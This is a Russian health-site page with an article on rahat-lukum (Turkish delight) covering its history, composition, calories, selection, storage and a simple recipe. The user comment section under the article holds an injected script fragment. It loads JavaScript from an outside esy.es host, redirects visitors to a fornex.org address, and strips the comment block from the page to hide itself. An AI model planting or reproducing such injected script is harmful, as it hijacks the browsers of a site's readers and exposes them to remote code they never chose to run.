Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Рахат-лукум: турецкое нас...  >>  Рахат-лукум: турецкое наслаждение
 
Обратная связь
 

Рахат-лукум: турецкое наслаждение

Размер шрифта
03 февраля 2012 08:00
  • google_analytics: false
  • Нравится

Рахат-лукум в переводе с арабского означает: «сладость для горла», в переводе с турецкого – «удобный кусочек». Это одно из самых знаменитых восточных лакомств. На Западе оно получило красноречивое название «Турецкое наслаждение».

1 

Сладость, которую готовили из воды, сахара и крахмала, с добавлением эссенции из лепестков роз, существует уже более 500 лет.

История продукта

В Стамбуле, в конце XVIII века это лакомство было предложено султану придворным турецким кондитером Али Мухиддин Хаджи Бекиром. Хаджи Бекир создал несколько новых сортов лукума, добавив в него орехи.

В 1897 году, внук Хаджи Бекира, — Мехмед Мухиддин, представил рахат-лукум европейской публике на Брюссельской выставке, получил золотую медаль выставки и заключил контракты на поставку рахат-лукума в Европу.

Это лакомство было одним из любимых у таких мировых лидеров, как Наполеон и Уинстон Черчилль.

Состав

Эта сладость готовится из сахара, крахмала и патоки, с добавлением орехов или фруктовых соков. Также в лукум входят добавки для придания различных вкусов и ароматов - орехи, шафран, изюм, цедра, куркума и другие.

Современные кондитеры, трепетно относящиеся к традиции, стараются использовать в приготовлении лакомства только розовую воду, как в оригинальном рецепте.

Имеет студнеобразную, слегка тянущуюся, вязкую структуру.

Свойства

Среди веществ, которыми богат лукум особенно выделяется глюкоза. Она улучшает работу головного мозга, сердца, стимулирует выработку эндорфинов, которые повышают работоспособность, настроение.

Калории – 316 кКал

Белки - 0,8 г

Жиры - 0,7 г

Углеводы - 79,4 г

В больших количествах употребление сладких продуктов способствует быстрому набору веса. Сахар в большом количестве снижает содержание хрома в организме, что приводит к колебаниям уровня глюкозы в крови. Человек быстрее устает, снижается работоспособность мозга. Если организм долгое время вырабатывает большое количество инсулина, чтобы снизит уровень глюкозы в крови после её массового выброса, то это приводит к постепенному развитию диабета.

Пьедестал почета:

Халва подсолнечная – 516 кКал
Мармелад – 321 кКал
Рахат-лукум – 316 кКал

Как выбрать

  1. Качественный рахат-лукум обязательно должен содержать патоку, фруктовое пюре или фруктовые соки, чистый крахмал и орехи.

  2. От качества крахмала зависит прозрачность восточного лакомства.

  3. Для того чтобы сладости не слипались, их обсыпают сахарной пудрой или кокосовой стружкой. Кстати, стружка полезнее!

  4. Если рахат-лукум тянется, как резина, производитель нарушил технологию. У правильного рахат-лукума консистенция - нежная студнеобразная и лишь слегка тянущаяся.

Как хранить

  1. Готовый лукум хранится так, чтобы избежать контакта с воздухом.

  2. Разрезанный рахат-лукум можно хранить в прохладном месте завернутым в пергамент (но не в фольгу и не в пленку – он там сделается влажным).

  3. Готовый рахат-лукум принято хранить, обернутым в бумагу, чтобы избежать обветривания. В холодильнике в герметично закрытой емкости.

Как готовить

Вскипятить сахар вместе с одним стаканом воды, добавить крахмал. Варить до загустения. В самом конце добавить фруктовую патоку, ванилин и лимонную кислоту. Слить массу в плоскую форму и дать застыть.

Подавать рахат-лукум нарезанным на кусочки и посыпанным сахарной пудрой.



Сюжеты по теме:
Рахат-лукум. Восточная сладость

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:57

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.